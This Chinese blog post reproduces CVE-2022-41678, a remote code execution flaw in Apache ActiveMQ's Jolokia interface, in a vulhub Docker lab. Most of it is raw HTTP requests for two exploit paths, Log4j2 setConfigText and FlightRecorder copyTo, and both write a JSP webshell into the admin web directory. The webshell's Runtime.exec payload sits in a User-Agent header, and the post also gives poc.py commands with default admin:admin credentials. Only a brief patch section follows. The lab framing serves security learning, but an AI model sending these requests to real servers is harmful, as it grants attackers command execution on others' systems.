ActiveMQ Jolokia 代码执行漏洞(CVE-2022-41678)复现

天猫来下凡2023-12-06 2:02

ActiveMQ Jolokia 后台代码执行漏洞(CVE-2022-41678)复现

1.漏洞描述

ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。

ActiveMQ后台存在Jolokia 代码执行漏洞,在ActiveMQ中,经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean,成功利用此漏洞可导致远程代码执行

影响版本

Apache ActiveMQ < 5.16.6

5.17.0< Apache ActiveMQ < 5.17.4

2.漏洞复现

https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2022-41678

复制代码 
docker compose up -d

服务启动后,访问http://your-ip:8161/后输入账号密码adminadmin,即可成功登录后台。

2.1 方法一

第一个方法是使用org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean,这是由Log4j2提供的一个MBean。

攻击者使用这个MBean中的setConfigText操作可以更改Log4j的配置,进而将日志文件写入任意目录中。

总共4个数据包,第一步访问,获取到MBean值,此处需要加入Origin值,Authorization值为admin:admin的base64加密值

复制代码 
/api/jolokia/list

如果GET访问失败可以POST访问

第2步访问,此处的mbean在第一步获取到,此处xml文件需要进行转义

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 1944
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "org.apache.logging.log4j2:type=6ddf90b0", "operation": "setConfigText", "arguments": ["xml", "utf-8"]}

xml为POC中的evil_template内容,此处出现"status":200,就可以证明漏洞存在

第3步进行注入

复制代码 
GET /api/jolokia/version HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla ||| <% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %> |||
Origin: http://192.168.2.133:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

第4步和第2步类似,xml文件内容替换成POC中original_template内容

到此处,shell.jsp已经写入,访问进行命令执行

http://192.168.2.131:8161/admin/shell.jsp?cmd=id

POC执行命令:

复制代码 
python poc.py -u admin -p admin http://192.168.2.133:8161

2.2 方法二

主要问题出在FlightRecorder这个Mbean,漏洞思路是通过setConfiguration修改配置,录制完成后,通过copyTo导出到web目录即可。

第1步一样访问,获取mbean值

复制代码 
/api/jolokia/list

第2步如下,进行新增记录newRecording,获取value值

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 113
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "newRecording", "arguments": []}

第3步一样,更改配置文件信息,xml为poc中的record_template值

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 33032
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "setConfiguration", "arguments": [2,"xml" ]

第4步,开始录制

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 116
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "startRecording", "arguments": [2]}

第5步,结束录制

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 115
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "stopRecording", "arguments": [2]}

最后导出到web目录下

复制代码 
POST /api/jolokia/ HTTP/1.1
Host: 192.168.2.133:8161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Origin: http://192.168.2.133:8161
Content-Length: 138
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "copyTo", "arguments": [2, "webapps/admin/shelljfr.jsp"]}

Webshell被写入在/admin/shelljfr.jsp文件中:

对应POC命令

复制代码 
python poc.py -u admin -p admin --exploit jfr http://localhost:8161

3.漏洞修复

安全更新

官方已推出安全更新,受影响用户可升级到以下版本:

Apache ActiveMQ >= 5.17.4

Apache ActiveMQ >= 5.16.6

缓解措施

相关推荐
瘾大侠23 分钟前
OSCP+ 100分 7小时考试心得分享
安全·web安全·网络安全
lingggggaaaa44 分钟前
PHP模型开发篇&MVC层&动态调试未授权&脆弱鉴权&未引用&错误逻辑
开发语言·安全·web安全·网络安全·php·mvc·代码审计
@insist1232 小时前
网络工程师-网络安全核心加密技术体系:对称 / 非对称加密、数字签名与证书全解析
网络·安全·web安全·网络工程师·软考·软件水平考试
Andya_net2 小时前
网络安全 | 如何通过CDN和WAF联动实现加速和安全双协同的网站防护体系
安全·web安全
qq_260241232 小时前
将盾CDN:网络安全情报共享的实践与挑战
网络·安全·web安全
悟道子HD18 小时前
SRC漏洞挖掘——2.SQL注入漏洞实战详解
sql·web安全·网络安全·渗透测试·sql注入·sqlmap·暴力破解
汤愈韬19 小时前
网络安全之网络基础知识_2
网络协议·安全·web安全
zjeweler21 小时前
网安护网面试-2-国誉护网面试
web安全·网络安全·面试·职场和发展·护网行动·护网面试
xian_wwq1 天前
【学习笔记】GB/T 20986-2023 详解,10 类网络安全事件分类
笔记·学习·web安全
程序员晓晓1 天前
【网络安全零基础入门】应急响应之服务器入侵排查,小白零基础入门到精通教程
服务器·web安全·计算机·网络安全·渗透测试·黑客技术·网安应急响应
热门推荐
01一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛02GitHub 镜像站点032026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析06VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)07OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程08免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手09Oh My Codex 快速使用指南10CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南